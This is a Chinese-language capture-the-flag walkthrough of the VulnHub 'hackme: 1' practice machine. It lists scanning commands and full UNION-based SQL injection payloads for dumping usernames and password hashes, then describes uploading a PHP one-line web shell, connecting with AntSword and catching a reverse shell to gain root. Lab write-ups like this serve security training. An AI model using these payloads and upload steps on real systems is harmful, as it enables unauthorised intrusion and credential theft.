一.靶场介绍
1.靶机下载地址:hackme: 1 ~ VulnHubhttps://www.vulnhub.com/entry/hackme-1,330/
2..将靶机下载并导入到VMware虚拟机当中,开启hackme1靶场,并开启kali当作攻击机
3.将两台虚拟机均设为桥接模式
二.靶机渗透
1.主机发现 查看同一网段的所有IP,寻找靶机的IP地址,发现靶机IP为192.168.3.232
arp-scan -l
2. 对靶机进行端口扫描,发现开放80和22端口
nmap 192.168.3.232
3.通过dirb http://192.168.3.232命令查看80端口的详细目录,发现目录为upload
三.渗透流程
SQL注入
1.登录主页发现登陆页面,并且可以注册用户
2.点击 Sign up now 注册用户admin 密码123456
3.登录admin用户,点击search可以查看全部
4.验证sql注入 Windows OS' and 1=1#
Windows OS' and 1=2#
由以上验证出此处存在字符型(单引号)sql注入
5.判断字段数 Windows OS' order by 3#
Windows OS' order by 4#
由以上验证得出字段数为3
6.判断显示位置 -1' union select 1,2,3#
7、查看当前数据库位置 -1' union select database(),2,3#
8.查看webapphacking库所有的表 -1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#
9.查看users表中所有的列 -1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#
10.查看表中user,password字段数据 -1' union select group_concat(user),group_concat(pasword),3 from users#
11.将密码进行MD5解密
以此类推,将所有密码解密
四.文件上传
1.使用superadmin用户登录 密码:Uncrackable 发现文件上传点
2.上传phpinfo()进行验证
该上传点存在文件上传漏洞
3.尝试上传一句话木马
页面空白,说明木马上传成功
4.使用中国蚁剑链接 !注意一句话木马的密码应和蚁剑连接时保持一致
5.kali生成木马文件
6. 将木马文件上传至靶机中
7.kali开启监听
8.蚁剑中运行木马文件
9.获取shell
10. 获得root